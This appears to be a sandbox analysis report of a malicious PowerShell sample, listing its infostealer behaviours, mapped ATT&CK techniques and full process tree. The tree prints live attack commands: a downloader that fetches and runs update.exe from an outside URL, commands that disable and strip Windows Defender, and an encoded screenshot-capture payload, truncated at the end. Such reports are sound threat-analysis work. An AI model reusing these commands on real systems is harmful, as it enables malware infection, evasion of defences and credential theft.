0eead4ad7b83a5d3d341d34c4c8fa6d0b2b56ba486e60de1a9a315b0bc0d5dc0

Analysis

max time kernel
300s
max time network
305s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
16/08/2024, 21:27

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

138978.ps1
Size

1KB
MD5

d57f9a7c9681fe296fc447228d5affa8
SHA1

155391c32ca9e3d371a29303a56a10944845bb24
SHA256

0eead4ad7b83a5d3d341d34c4c8fa6d0b2b56ba486e60de1a9a315b0bc0d5dc0
SHA512

5080e2a9ab5f707edffeecd2b5e247213f32b38d49fa9dc618f290c43fb68deb43f51d16ee363a307f8862b1465489b4d713eb90fc487b99f173330e8f61c595

Score

10^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.thaisbobetx.com/wp-content/uploads/2023/03/update-live.zip

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	1712	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1712	powershell.exe
560	powershell.exe
4948	powershell.exe
1592	powershell.exe
1876	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2972	cmd.exe
3936	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
1880	update.exe
1156	update.exe
4468	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe
1156	update.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1496	tasklist.exe
2832	tasklist.exe
1400	tasklist.exe
4156	tasklist.exe
5040	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2184	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
600	PING.EXE
1956	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2364	netsh.exe
5024	cmd.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1700	WMIC.exe
1240	WMIC.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4548	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2428	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
600	PING.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
4948	powershell.exe
4948	powershell.exe
1712	powershell.exe
1712	powershell.exe
1592	powershell.exe
560	powershell.exe
560	powershell.exe
560	powershell.exe
1592	powershell.exe
1592	powershell.exe
3936	powershell.exe
3936	powershell.exe
3936	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
1876	powershell.exe
1876	powershell.exe
1876	powershell.exe
4884	powershell.exe
4884	powershell.exe
4884	powershell.exe
3880	powershell.exe
3880	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	1496	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3936	WMIC.exe
Token: SeSecurityPrivilege	3936	WMIC.exe
Token: SeTakeOwnershipPrivilege	3936	WMIC.exe
Token: SeLoadDriverPrivilege	3936	WMIC.exe
Token: SeSystemProfilePrivilege	3936	WMIC.exe
Token: SeSystemtimePrivilege	3936	WMIC.exe
Token: SeProfSingleProcessPrivilege	3936	WMIC.exe
Token: SeIncBasePriorityPrivilege	3936	WMIC.exe
Token: SeCreatePagefilePrivilege	3936	WMIC.exe
Token: SeBackupPrivilege	3936	WMIC.exe
Token: SeRestorePrivilege	3936	WMIC.exe
Token: SeShutdownPrivilege	3936	WMIC.exe
Token: SeDebugPrivilege	3936	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3936	WMIC.exe
Token: SeRemoteShutdownPrivilege	3936	WMIC.exe
Token: SeUndockPrivilege	3936	WMIC.exe
Token: SeManageVolumePrivilege	3936	WMIC.exe
Token: 33	3936	WMIC.exe
Token: 34	3936	WMIC.exe
Token: 35	3936	WMIC.exe
Token: 36	3936	WMIC.exe
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeIncreaseQuotaPrivilege	3936	WMIC.exe
Token: SeSecurityPrivilege	3936	WMIC.exe
Token: SeTakeOwnershipPrivilege	3936	WMIC.exe
Token: SeLoadDriverPrivilege	3936	WMIC.exe
Token: SeSystemProfilePrivilege	3936	WMIC.exe
Token: SeSystemtimePrivilege	3936	WMIC.exe
Token: SeProfSingleProcessPrivilege	3936	WMIC.exe
Token: SeIncBasePriorityPrivilege	3936	WMIC.exe
Token: SeCreatePagefilePrivilege	3936	WMIC.exe
Token: SeBackupPrivilege	3936	WMIC.exe
Token: SeRestorePrivilege	3936	WMIC.exe
Token: SeShutdownPrivilege	3936	WMIC.exe
Token: SeDebugPrivilege	3936	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3936	WMIC.exe
Token: SeRemoteShutdownPrivilege	3936	WMIC.exe
Token: SeUndockPrivilege	3936	WMIC.exe
Token: SeManageVolumePrivilege	3936	WMIC.exe
Token: 33	3936	WMIC.exe
Token: 34	3936	WMIC.exe
Token: 35	3936	WMIC.exe
Token: 36	3936	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1700	WMIC.exe
Token: SeSecurityPrivilege	1700	WMIC.exe
Token: SeTakeOwnershipPrivilege	1700	WMIC.exe
Token: SeLoadDriverPrivilege	1700	WMIC.exe
Token: SeSystemProfilePrivilege	1700	WMIC.exe
Token: SeSystemtimePrivilege	1700	WMIC.exe
Token: SeProfSingleProcessPrivilege	1700	WMIC.exe
Token: SeIncBasePriorityPrivilege	1700	WMIC.exe
Token: SeCreatePagefilePrivilege	1700	WMIC.exe
Token: SeBackupPrivilege	1700	WMIC.exe
Token: SeRestorePrivilege	1700	WMIC.exe
Token: SeShutdownPrivilege	1700	WMIC.exe
Token: SeDebugPrivilege	1700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1700	WMIC.exe
Token: SeRemoteShutdownPrivilege	1700	WMIC.exe
Token: SeUndockPrivilege	1700	WMIC.exe
Token: SeManageVolumePrivilege	1700	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4948 wrote to memory of 4548	4948	powershell.exe	82
PID 4948 wrote to memory of 4548	4948	powershell.exe	82
PID 4948 wrote to memory of 1712	4948	powershell.exe	84
PID 4948 wrote to memory of 1712	4948	powershell.exe	84
PID 1712 wrote to memory of 1880	1712	powershell.exe	86
PID 1712 wrote to memory of 1880	1712	powershell.exe	86
PID 1880 wrote to memory of 1156	1880	update.exe	87
PID 1880 wrote to memory of 1156	1880	update.exe	87
PID 1156 wrote to memory of 5104	1156	update.exe	88
PID 1156 wrote to memory of 5104	1156	update.exe	88
PID 1156 wrote to memory of 1220	1156	update.exe	89
PID 1156 wrote to memory of 1220	1156	update.exe	89
PID 1156 wrote to memory of 1212	1156	update.exe	92
PID 1156 wrote to memory of 1212	1156	update.exe	92
PID 1156 wrote to memory of 3296	1156	update.exe	94
PID 1156 wrote to memory of 3296	1156	update.exe	94
PID 1212 wrote to memory of 1496	1212	cmd.exe	96
PID 1212 wrote to memory of 1496	1212	cmd.exe	96
PID 5104 wrote to memory of 560	5104	cmd.exe	97
PID 5104 wrote to memory of 560	5104	cmd.exe	97
PID 1220 wrote to memory of 1592	1220	cmd.exe	98
PID 1220 wrote to memory of 1592	1220	cmd.exe	98
PID 3296 wrote to memory of 3936	3296	cmd.exe	171
PID 3296 wrote to memory of 3936	3296	cmd.exe	171
PID 1156 wrote to memory of 1436	1156	update.exe	101
PID 1156 wrote to memory of 1436	1156	update.exe	101
PID 1436 wrote to memory of 828	1436	cmd.exe	103
PID 1436 wrote to memory of 828	1436	cmd.exe	103
PID 1156 wrote to memory of 1956	1156	update.exe	104
PID 1156 wrote to memory of 1956	1156	update.exe	104
PID 1956 wrote to memory of 4920	1956	cmd.exe	106
PID 1956 wrote to memory of 4920	1956	cmd.exe	106
PID 1156 wrote to memory of 3028	1156	update.exe	107
PID 1156 wrote to memory of 3028	1156	update.exe	107
PID 3028 wrote to memory of 1700	3028	cmd.exe	178
PID 3028 wrote to memory of 1700	3028	cmd.exe	178
PID 1156 wrote to memory of 4316	1156	update.exe	110
PID 1156 wrote to memory of 4316	1156	update.exe	110
PID 4316 wrote to memory of 1240	4316	cmd.exe	173
PID 4316 wrote to memory of 1240	4316	cmd.exe	173
PID 1156 wrote to memory of 2184	1156	update.exe	113
PID 1156 wrote to memory of 2184	1156	update.exe	113
PID 2184 wrote to memory of 1692	2184	cmd.exe	115
PID 2184 wrote to memory of 1692	2184	cmd.exe	115
PID 1156 wrote to memory of 4004	1156	update.exe	116
PID 1156 wrote to memory of 4004	1156	update.exe	116
PID 1156 wrote to memory of 2608	1156	update.exe	117
PID 1156 wrote to memory of 2608	1156	update.exe	117
PID 1156 wrote to memory of 3688	1156	update.exe	118
PID 1156 wrote to memory of 3688	1156	update.exe	118
PID 1156 wrote to memory of 2888	1156	update.exe	122
PID 1156 wrote to memory of 2888	1156	update.exe	122
PID 1156 wrote to memory of 2972	1156	update.exe	124
PID 1156 wrote to memory of 2972	1156	update.exe	124
PID 4004 wrote to memory of 1400	4004	cmd.exe	126
PID 4004 wrote to memory of 1400	4004	cmd.exe	126
PID 2608 wrote to memory of 4904	2608	cmd.exe	127
PID 2608 wrote to memory of 4904	2608	cmd.exe	127
PID 3688 wrote to memory of 2832	3688	cmd.exe	128
PID 3688 wrote to memory of 2832	3688	cmd.exe	128
PID 2888 wrote to memory of 1444	2888	cmd.exe	129
PID 2888 wrote to memory of 1444	2888	cmd.exe	129
PID 2972 wrote to memory of 3936	2972	cmd.exe	171
PID 2972 wrote to memory of 3936	2972	cmd.exe	171

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4888	attrib.exe
1692	attrib.exe
2020	attrib.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\138978.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4948
- C:\Windows\system32\ipconfig.exe
  "C:\Windows\system32\ipconfig.exe" /flushdns
  2⤵
  - Gathers network information
  PID:4548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $sb = { $a = 'https://www.thaisbobetx.com/wp-content/uploads/2023/03/update-live.zip'; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls12 -bor [Net.SecurityProtocolType]::Ssl3; $b = Get-Random -Minimum 8 -Maximum 16; $c = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; $d = -join (1..$b | ForEach-Object { Get-Random -InputObject $c.ToCharArray() }); $e = Join-Path $env:TEMP $d; New-Item -ItemType Directory -Path $e -ErrorAction SilentlyContinue; $g = Join-Path $e 'Helper.zip'; while ($true) { try { Invoke-WebRequest -Uri $a -OutFile $g -ErrorAction SilentlyContinue; if (Test-Path $g) { break } } catch { Start-Sleep -Seconds 5 } }; Expand-Archive -Path $g -DestinationPath $e -ErrorAction SilentlyContinue; Start-Sleep 2; $i = Join-Path $e 'update.exe'; Start-Process -FilePath $i; Set-Clipboard -Value $null;}; & $sb | Out-Null;
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1712
- - C:\Users\Admin\AppData\Local\Temp\CGljruZqVz\update.exe
    "C:\Users\Admin\AppData\Local\Temp\CGljruZqVz\update.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1880
  - - C:\Users\Admin\AppData\Local\Temp\CGljruZqVz\update.exe
      "C:\Users\Admin\AppData\Local\Temp\CGljruZqVz\update.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1156
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CGljruZqVz\update.exe'"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5104
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CGljruZqVz\update.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:560
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1220
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1212
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1496
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3296
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3936
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1436
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        6⤵
        
        PID:828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1956
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        6⤵
        
        PID:4920
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3028
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:1700
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4316
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:1240
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\CGljruZqVz\update.exe""
        5⤵
        Hide Artifacts: Hidden Files and Directories
        Suspicious use of WriteProcessMemory
        
        PID:2184
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\Temp\CGljruZqVz\update.exe"
        6⤵
        Views/modifies file attributes
        
        PID:1692
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4004
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:1400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2608
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:4904
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3688
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:2832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2888
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:1444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        Suspicious use of WriteProcessMemory
        
        PID:2972
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:3936
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:2340
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:4156
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:2784
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:4636
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5024
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2364
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:1752
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2984
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:1816
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:2428
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        5⤵
        
        PID:768
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        6⤵
        
        PID:1068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEA